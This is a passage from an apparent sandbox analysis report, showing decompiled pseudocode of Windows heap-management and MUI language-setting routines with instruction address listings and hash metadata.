									E01161411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E010C7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E010C7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x1198748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E010AB150();
							} else {
								E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E010AB150();
							__eflags =  *0x1197bc8;
							if( *0x1197bc8 == 0) {
								__eflags = 0;
								E01162073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x1198748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E010AB150();
												} else {
													E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E010AB150();
												__eflags =  *0x1197bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E01162073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0116A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E010CA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E010CB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E010CA830(_t553, _v64, _v24);
								_t286 = E010C7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E010C7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01161411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E010C7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E010C7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E01161411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E010D174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E010CB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E010C7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E011614FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E010C99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E010CA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E010DABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                          0x010ca309
                                          0x010ca316
                                          0x010ca319
                                          0x010ca31d
                                          0x010ca32d
                                          0x010ca331
                                          0x01111e0d
                                          0x01111e10
                                          0x010ca3cb
                                          0x010ca3cb
                                          0x010ca3bd
                                          0x010ca3c3
                                          0x010ca3c3
                                          0x010ca33a
                                          0x01111e17
                                          0x01111e1b
                                          0x01111e1d
                                          0x01111e2f
                                          0x01111e34
                                          0x01111e36
                                          0x01111e3c
                                          0x01111e3c
                                          0x01111e3c
                                          0x01111e3c
                                          0x01111e36
                                          0x01111e42
                                          0x01111e45
                                          0x01111e47
                                          0x010ca3f8
                                          0x010ca3f8
                                          0x010ca3fb
                                          0x010ca3fd
                                          0x01111e50
                                          0x010ca403
                                          0x010ca411
                                          0x010ca411
                                          0x010ca411
                                          0x010ca41e
                                          0x010ca420
                                          0x010ca424
                                          0x010ca427
                                          0x010ca7c9
                                          0x010ca7cd
                                          0x010ca7d2
                                          0x010ca7d9
                                          0x010ca7e0
                                          0x010ca7e3
                                          0x010ca7ed
                                          0x010ca7f3
                                          0x010ca7f9
                                          0x010ca7ff
                                          0x010ca802
                                          0x010ca807
                                          0x010ca809
                                          0x010ca809
                                          0x010ca809
                                          0x010ca80f
                                          0x010ca80f
                                          0x010ca812
                                          0x010ca81c
                                          0x010ca821
                                          0x010ca824
                                          0x010ca42d
                                          0x010ca42d
                                          0x010ca42d
                                          0x010ca42d
                                          0x010ca42d
                                          0x010ca436
                                          0x010ca43a
                                          0x010ca609
                                          0x010ca60d
                                          0x010ca612
                                          0x010ca616
                                          0x010ca61a
                                          0x01111e57
                                          0x01111e59
                                          0x00000000
                                          0x00000000
                                          0x01111e5f
                                          0x010ca620
                                          0x010ca627
                                          0x01111e64
                                          0x01111e66
                                          0x01111e6c
                                          0x01111e72
                                          0x01111e76
                                          0x01111e95
                                          0x01111e9a
                                          0x01111e78
                                          0x01111e8d
                                          0x01111e92
                                          0x01111ea0
                                          0x01111ea5
                                          0x01111eaa
                                          0x01111eb2
                                          0x01111eb6
                                          0x01111eb9
                                          0x01111eb9
                                          0x01111ebe
                                          0x01111ec2
                                          0x01111ec2
                                          0x01111e66
                                          0x010ca62d
                                          0x010ca633
                                          0x010ca636
                                          0x010ca63a
                                          0x010ca63c
                                          0x010ca640
                                          0x010ca642
                                          0x010ca644
                                          0x010ca644
                                          0x010ca644
                                          0x010ca64d
                                          0x010ca64d
                                          0x010ca651
                                          0x010ca655
                                          0x01111eca
                                          0x01111ed1
                                          0x00000000
                                          0x00000000
                                          0x01111ed7
                                          0x00000000
                                          0x010ca65b
                                          0x010ca669
                                          0x010ca66e
                                          0x010ca670
                                          0x00000000
                                          0x00000000
                                          0x010ca676
                                          0x010ca67b
                                          0x010ca680
                                          0x010ca682
                                          0x01111f1a
                                          0x010ca688
                                          0x010ca688
                                          0x010ca688
                                          0x010ca68a
                                          0x010ca68d
                                          0x01111f24
                                          0x01111f2a
                                          0x01111f31
                                          0x01111f43
                                          0x01111f43
                                          0x01111f31
                                          0x010ca693
                                          0x010ca697
                                          0x010ca69d
                                          0x010ca6a0
                                          0x010ca6a6
                                          0x010ca6a8
                                          0x010ca6a8
                                          0x010ca6a8
                                          0x010ca6a8
                                          0x010ca6b2
                                          0x010ca6b7
                                          0x010ca6c1
                                          0x010ca6c6
                                          0x010ca6d2
                                          0x010ca6d9
                                          0x010ca6e3
                                          0x010ca6e6
                                          0x010ca6eb
                                          0x010ca6ed
                                          0x010ca6ed
                                          0x010ca6ed
                                          0x010ca6ed
                                          0x010ca6f3
                                          0x010ca6f8
                                          0x010ca702
                                          0x010ca70a
                                          0x010ca70e
                                          0x010ca71a
                                          0x010ca71e
                                          0x01111fcb
                                          0x01111fcf
                                          0x01111fdd
                                          0x01111fe3
                                          0x01111fe3
                                          0x010ca724
                                          0x010ca728
                                          0x010ca72a
                                          0x010ca72d
                                          0x010ca737
                                          0x010ca73a
                                          0x010ca73c
                                          0x010ca742
                                          0x010ca748
                                          0x01111f4d
                                          0x01111f50
                                          0x01111f56
                                          0x01111f5c
                                          0x01111f5f
                                          0x01111f7e
                                          0x01111f83
                                          0x01111f61
                                          0x01111f76
                                          0x01111f7b
                                          0x01111f89
                                          0x01111f8e
                                          0x01111f93
                                          0x01111f94
                                          0x01111f9a
                                          0x01111f9c
                                          0x01111f9e
                                          0x01111fa1
                                          0x01111fa1
                                          0x01111fa6
                                          0x01111fa6
                                          0x01111f50
                                          0x010ca74e
                                          0x010ca751
                                          0x010ca754
                                          0x010ca75d
                                          0x010ca75e
                                          0x010ca762
                                          0x010ca767
                                          0x01111faf
                                          0x01111fb0
                                          0x01111fb9
                                          0x01111fbe
                                          0x01111fc2
                                          0x01111fc2
                                          0x010ca76d
                                          0x010ca76d
                                          0x010ca775
                                          0x010ca778
                                          0x010ca77d
                                          0x010ca77d
                                          0x010ca71e
                                          0x010ca782
                                          0x010ca787
                                          0x010ca789
                                          0x01111ff3
                                          0x010ca78f
                                          0x010ca78f
                                          0x010ca78f
                                          0x010ca791
                                          0x010ca794
                                          0x01111ffd
                                          0x01112006
                                          0x0111200c
                                          0x01112017
                                          0x01112019
                                          0x01112024
                                          0x01112024
                                          0x01112024
                                          0x01112047
                                          0x01112047
                                          0x0111200c
                                          0x010ca79a
                                          0x010ca79f
                                          0x010ca7a4
                                          0x010ca7a9
                                          0x010ca7ab
                                          0x0111205a
                                          0x010ca7b1
                                          0x010ca7b1
                                          0x010ca7b1
                                          0x010ca7b3
                                          0x010ca7b6
                                          0x00000000
                                          0x010ca7bc
                                          0x01112066
                                          0x01112068
                                          0x01112073
                                          0x01112073
                                          0x01112073
                                          0x01112078
                                          0x01112079
                                          0x0111207d
                                          0x00000000
                                          0x0111207d
                                          0x010ca7b6
                                          0x010ca440
                                          0x010ca440
                                          0x010ca440
                                          0x010ca446
                                          0x010ca44c
                                          0x010ca44f
                                          0x010ca453
                                          0x010ca455
                                          0x011120b3
                                          0x011120b9
                                          0x011120b9
                                          0x010ca45d
                                          0x010ca460
                                          0x010ca464
                                          0x010ca466
                                          0x010ca46b
                                          0x010ca46f
                                          0x010ca471
                                          0x010ca471
                                          0x010ca471
                                          0x010ca474
                                          0x010ca479
                                          0x010ca47d
                                          0x010ca47f
                                          0x01112229
                                          0x0111222f
                                          0x010ca3c8
                                          0x010ca3c8
                                          0x010ca3ca
                                          0x010ca3ca
                                          0x00000000
                                          0x010ca3ca
                                          0x01112235
                                          0x0111223a
                                          0x0111223a
                                          0x00000000
                                          0x00000000
                                          0x01112240
                                          0x01112246
                                          0x0111224a
                                          0x01112269
                                          0x0111226e
                                          0x0111224c
                                          0x01112261
                                          0x01112266
                                          0x01112274
                                          0x01112279
                                          0x0111227e
                                          0x01112286
                                          0x01112288
                                          0x0111228d
                                          0x0111228d
                                          0x01112292
                                          0x01112292
                                          0x01112295
                                          0x01112295
                                          0x00000000
                                          0x01112295
                                          0x010ca485
                                          0x010ca489
                                          0x010ca48b
                                          0x010ca48f
                                          0x010ca493
                                          0x010ca497
                                          0x010ca49b
                                          0x010ca4bb
                                          0x010ca4bb
                                          0x010ca4bd
                                          0x010ca4ff
                                          0x010ca4ff
                                          0x010ca501
                                          0x010ca505
                                          0x010ca50f
                                          0x010ca517
                                          0x010ca51b
                                          0x010ca527
                                          0x010ca52b
                                          0x01112182
                                          0x01112185
                                          0x01112193
                                          0x01112199
                                          0x01112199
                                          0x010ca531
                                          0x010ca535
                                          0x010ca538
                                          0x010ca548
                                          0x010ca54b
                                          0x010ca54d
                                          0x010ca553
                                          0x010ca559
                                          0x01112100
                                          0x01112103
                                          0x01112109
                                          0x0111210f
                                          0x01112112
                                          0x01112131
                                          0x01112136
                                          0x01112114
                                          0x01112129
                                          0x0111212e
                                          0x0111213c
                                          0x01112141
                                          0x01112147
                                          0x0111214d
                                          0x01112151
                                          0x01112154
                                          0x01112154
                                          0x01112159
                                          0x01112159
                                          0x01112103
                                          0x010ca55f
                                          0x010ca562
                                          0x010ca565
                                          0x010ca567
                                          0x01112162
                                          0x010ca56d
                                          0x010ca574
                                          0x010ca575
                                          0x010ca579
                                          0x010ca57e
                                          0x01112169
                                          0x0111216a
                                          0x01112170
                                          0x01112175
                                          0x01112179
                                          0x01112179
                                          0x010ca57e
                                          0x010ca584
                                          0x010ca58f
                                          0x010ca58f
                                          0x010ca52b
                                          0x010ca5ad
                                          0x010ca5bc
                                          0x010ca5c1
                                          0x010ca5c6
                                          0x010ca5cb
                                          0x010ca5cd
                                          0x011121a9
                                          0x010ca5d3
                                          0x010ca5d3
                                          0x010ca5d3
                                          0x010ca5d5
                                          0x010ca5d8
                                          0x011121b3
                                          0x011121bc
                                          0x011121c2
                                          0x011121cd
                                          0x011121cf
                                          0x011121da
                                          0x011121da
                                          0x011121da
                                          0x011121f7
                                          0x011121f7
                                          0x011121c2
                                          0x010ca5de
                                          0x010ca5e3
                                          0x010ca5e8
                                          0x010ca5ea
                                          0x0111220a
                                          0x010ca5f0
                                          0x010ca5f0
                                          0x010ca5f0
                                          0x010ca5f2
                                          0x010ca5f5
                                          0x01112219
                                          0x0111221b
                                          0x0111208c
                                          0x0111208c
                                          0x0111208c
                                          0x01112095
                                          0x01112096
                                          0x01112097
                                          0x01112098
                                          0x011120a4
                                          0x011120a5
                                          0x011120a9
                                          0x011120a9
                                          0x00000000
                                          0x010ca5f5
                                          0x010ca4bf
                                          0x010ca4d3
                                          0x010ca4d8
                                          0x010ca4da
                                          0x01111ede
                                          0x01111ede
                                          0x01111ee4
                                          0x01111ee9
                                          0x00000000
                                          0x00000000
                                          0x01111f07
                                          0x00000000
                                          0x01111f07
                                          0x010ca4e0
                                          0x010ca4e5
                                          0x010ca4e7
                                          0x011120cb
                                          0x010ca4ed
                                          0x010ca4ed
                                          0x010ca4ed
                                          0x010ca4f2
                                          0x010ca4f5
                                          0x011120d5
                                          0x011120de
                                          0x011120e4
                                          0x011120f6
                                          0x011120f6
                                          0x011120e4
                                          0x010ca4fb
                                          0x00000000
                                          0x010ca4fb
                                          0x010ca4a1
                                          0x010ca4a4
                                          0x010ca4a8
                                          0x00000000
                                          0x00000000
                                          0x010ca4aa
                                          0x010ca4ac
                                          0x00000000
                                          0x00000000
                                          0x010ca4b2
                                          0x010ca4b5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010ca4b5
                                          0x010ca43a
                                          0x010ca340
                                          0x010ca346
                                          0x010ca600
                                          0x00000000
                                          0x010ca600
                                          0x010ca34f
                                          0x010ca351
                                          0x010ca358
                                          0x010ca3c6
                                          0x00000000
                                          0x010ca371
                                          0x010ca37a
                                          0x010ca37f
                                          0x010ca382
                                          0x010ca384
                                          0x010ca394
                                          0x00000000
                                          0x010ca396
                                          0x010ca399
                                          0x010ca3a7
                                          0x010ca3b0
                                          0x010ca3b4
                                          0x010ca3bb
                                          0x010ca3d2
                                          0x010ca3da
                                          0x010ca3df
                                          0x010ca3e1
                                          0x010ca3e5
                                          0x010ca3ea
                                          0x010ca3f0
                                          0x010ca3f0
                                          0x010ca3e1
                                          0x00000000
                                          0x010ca3bb
                                          0x010ca394

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: 3dd79ecff0fa8b2ab856215a447760cf9941131c936040cd058bf86262a8e876
                                          • Instruction ID: 9ac60b1a42ef75827fbf59dd897f08fd7cb6e72cf89cd869f6fd53b1519f82e1
                                          • Opcode Fuzzy Hash: 3dd79ecff0fa8b2ab856215a447760cf9941131c936040cd058bf86262a8e876
                                          • Instruction Fuzzy Hash: AC42ED31608746DFC719CF28C884A6EFBE5BF88A04F148A6DE5C68B251E734D981CF52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010B3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E010B3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E010B1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E010B1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E010B1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E010B1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E010B1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L010C4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E010EF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E010F1370(_t276, 0x1084e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E010EBB40(0,  &_v68, _t170);
									if(L010B43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E010EBB40(_t257,  &_v68, _t243);
								if(L010B43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E010F1370(_t278, 0x1084e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L010C4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E010EF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E010F1370(_v16, 0x1084e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E010EBB40(_t262,  &_v68, _t244);
								if(L010B43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E010F1370(_t282, 0x1084e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E010EBB40(_t262,  &_v68, _t201);
							if(L010B43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L010C4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E010EF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E010F1370(_t280, 0x1084e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E010EBB40(_t267,  &_v68, _t245);
							if(L010B43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E010F1370(_t284, 0x1084e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E010EBB40(_t267,  &_v68, _t224);
						if(L010B43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                          0x010b3d3c
                                          0x010b3d42
                                          0x010b3d44
                                          0x010b3d46
                                          0x010b3d49
                                          0x010b3d4c
                                          0x010b3d4f
                                          0x010b3d52
                                          0x010b3d55
                                          0x010b3d58
                                          0x010b3d5b
                                          0x010b3d5f
                                          0x010b3d61
                                          0x010b3d66
                                          0x01108213
                                          0x01108218
                                          0x010b4085
                                          0x010b4088
                                          0x010b408e
                                          0x010b4094
                                          0x010b409a
                                          0x010b40a0
                                          0x010b40a6
                                          0x010b40a9
                                          0x010b40af
                                          0x010b40b6
                                          0x010b40bd
                                          0x010b40bd
                                          0x010b3d83
                                          0x0110821f
                                          0x01108229
                                          0x01108238
                                          0x01108238
                                          0x0110823d
                                          0x0110823d
                                          0x010b3da0
                                          0x010b3daf
                                          0x010b3db5
                                          0x010b3dba
                                          0x010b3dba
                                          0x010b3dd4
                                          0x010b3e94
                                          0x010b3eab
                                          0x010b3f6d
                                          0x010b3f84
                                          0x010b406b
                                          0x010b406b
                                          0x010b406e
                                          0x010b406e
                                          0x010b4070
                                          0x010b4074
                                          0x01108351
                                          0x01108351
                                          0x010b407a
                                          0x010b407f
                                          0x0110835d
                                          0x01108370
                                          0x01108377
                                          0x01108379
                                          0x0110837c
                                          0x0110837c
                                          0x0110835d
                                          0x00000000
                                          0x010b407f
                                          0x010b3f8a
                                          0x010b3f8d
                                          0x010b3f90
                                          0x010b3f95
                                          0x0110830d
